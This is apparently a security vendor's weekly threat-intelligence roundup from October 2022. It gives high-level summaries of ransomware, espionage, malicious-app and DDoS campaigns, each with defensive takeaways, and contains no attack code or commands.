Ransom Cartel Ransomware: A Possible Connection With REvil
(published: October 14, 2022)
Background:
Palo Alto Networks researchers analyzed Ransom Cartel, a double extortion ransomware-as-a-service group. Ransom Cartel came to existence in mid-December 2021 after the REvil group shut down. The Ransom Cartel group uses the Ransom Cartel ransomware, which shares significant code similarities with REvil, indicating close connections, but lacks REvil obfuscation engine capabilities.
Ransom Cartel has almost no obfuscation outside of the configuration: unlike REvil it does not use string encryption and API hashing. Among multiple tools utilized by Ransom Cartel, the DonPAPI credential dumper is unique for this group. It performs Windows Data Protection API (DPAPI) dumping by targeting DPAPI-protected credentials such as credentials saved in web browsers, RDP passwords, and Wi-Fi keys.
Takeaway:
Network defenders should consider monitoring or blocking high-risk connections such as TOR traffic that is often abused by Ransom Cartel and its affiliates. It is crucial that your company ensure that servers are always running the most current software version. Your company should have policies in place in regards to the proper configurations needed for your servers in order to conduct your business needs safely.
Budworm: Espionage Group Returns to Targeting U.S. Organizations
(published: October 13, 2022)
Background:
Six to eight years ago, China-sponsored group Emissary Panda (aka APT27, Budworm, TG-3390) was heavily targeting US organizations. Later it stopped targeting the US and was largely focused on Asia, Europe, and the Middle East. Over the past six months, the group has returned to the US targeting (a US state legislature), and attacked the government of a Middle Eastern country, as well as a multinational electronics manufacturer.
These recent attacks started by exploiting the Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45105) in the Apache Tomcat service on servers in order to install web shells. The attackers abused the CyberArk Viewfinity software for DLL side-loading to install various malware and tools. These include: their custom HyperBro backdoor, the PlugX backdoor, and/or using a number of commodity tools (Cobalt Strike, Fast Reverse Proxy (FRP), the Fscan intranet scanning tool, the IOX proxy and port-forwarding tool, and the LaZagne credential dumping tool.
Takeaway:
Keep operating systems updated. Establish baseline activity to detect unauthorized introduction of abused software.
Alchimist: A New Attack Framework in Chinese for Mac, Linux and Windows
(published: October 13, 2022)
Background:
Talos researchers have discovered a new attack framework dubbed Alchimist. It operates as a standalone GoLang-based executable that carries the implants and the whole web user interface written in simplified Chinese. Alchimist is targeting Windows, Linux, and macOS systems. It uses the Insekt RAT to target Windows and Linux. Alchimist MacOSX exploitation is based on a Mach-O dropper file that contains a CVE-2021-4034 privilege escalation exploit and a bind shell backdoor. Alchimist can choose one of the three protocols for C2 communication: regular TLS, Server Name Indication (SNI), or WebSocket Secure/WebSocket (WSS/WS).
Takeaway:
Attack frameworks such as Alchimist are easy-to-use off-the-shelf tools that can be abused by a wide range of attackers.
Magniber Ransomware Adopts JavaScript, Targeting Home Users with Fake Software Updates
(published: October 13, 2022)
Background:
HP researchers described a new ransomware dubbed Magniber. It is a single-client ransomware (focuses on home users), so it targets only Windows 10 and newer, and relies on users having administrative privileges. Since September 2022, Magniber spreads via ZIP files containing a JavaScript file that purports to be an antivirus or Windows update. Magniber uses the DotNetToJScript technique to run a .NET executable in memory only. For additional detection evasion, it bypasses User Account Control (UAC), and uses syscalls instead of standard Windows API libraries.
Takeaway:
If you think your system needs an update, use the official update channel. Configure your everyday account to be a user account and use an administrative account only when needed.
Learn about our Penetration Testing Services
WIP19 Espionage | New Chinese APT Targets IT Service Providers and Telcos With Signed Malware
(published: October 12, 2022)
Background:
SentinelOne researchers detected a new China-sponsored cyberespionage activity dubbed WIP19. This activity was targeting IT service and telecommunications providers in Asia and the Middle East. A portion of WIP19 tools were authored by WinEggDrop, a Chinese-speaking malware author who has created tools for a variety of groups such as Operation Shadow Force. WinEggDrop has been active since 2014, and the version of its SQLMaggie backdoor used by WIP19 was time-stamped with 2019. WIP19 has been signing its malware with a certificate stolen from the DEEPSoft Korean company. The attackers avoided stable C2 infrastructure, completed their operations in a “hands-on keyboard” fashion, during an interactive session with compromised machines.
Takeaway:
Telecommunications companies should include likely cyberespionage attacks into their threat model. Defense-in-depth is an effective way to help mitigate potential APT activity. Defense-in-depth involves the layering of defense mechanisms. This can include network and end-point security, social engineering training (such as training exercises to help detect phishing emails) for staff and robust threat intelligence capabilities.
Malicious WhatsApp Mod Distributed Through Legitimate Apps
(published: October 12, 2022)
Background:
Kaspersky researchers detected a new malicious WhatsApp modified build (mod) named YoWhatsApp (WhatsApp Plus). This malicious mod was brought to users through other legitimate applications: either through an ad in the Snaptube app, or through the Vidmate app internal store. The infected build of YoWhatsApp is a fully working messenger but it comes with a malicious module that decrypts and launches the main payload: Triada trojan. Infected users can lose control over their WhatsApp account, be set up for paid subscriptions, and end up distributing malicious spam.
Takeaway:
Application owners should vet the code they offer in their internal stores or via internal advertising. Android users should consider limiting the number of installed apps to those necessary and/or installing antivirus software on their device. Before adding an application, check its developer information, popularity, and reviews.
US Airports Taken Down in DDoS Attacks by Pro-Russian Hackers
(published: October 10, 2022)
Background:
On October 10, 2022, Russia-based hacktivist group KillNet attacked websites of several major airports in the US with distributed denial-of-service (DDoS). The attack affected public-facing websites of the Los Angeles International Airport (LAX), Hartsfield-Jackson Atlanta International Airport (ATL), Chicago O’Hare International Airport (ORD), as well as smaller airports in Arizona, Colorado, Florida, Hawaii, Kentucky, and Mississippi.
Takeaway:
This DDoS attack came the same day as Russia activated its kinetic actions in Ukraine with major rocket and drone strikes targeting Ukrainian cities. Hacktivist groups tend to utilize DDoS attacks as their main vector to affect businesses and government entities that they are not happy with. Denial-of-service attacks can potentially cost your company loss in revenue because severe attacks can shut down online services for extended periods of time. Organizations should implement DDoS protection measures and put in place a business continuity plan in the unfortunate case that your company is the target of a significant DDoS attack.
Observed Threats
KillNet
KillNet, a Russia-affiliated hacktivist group specialized in distributed denial of service (DDoS) attacks, originally created on the basis of a Russian-speaking DDoS-for-hire group with the same name. On February 26, 2022, KillNet formed an Anonymous-like collective to wage war on Anonymous (a loosely affiliated group of volunteer hacktivists), Ukraine, and countries that support Ukraine in a way hostile to Russia. The group united with other threat groups (XakNet Team), DDoS actors and services such as Stresser[.]tech. KillNet’s most popular media on Telegram messenger had over 90,000 subscribers.
Learn about our Penetration Testing Services
Subscribe So You Never Miss an Update
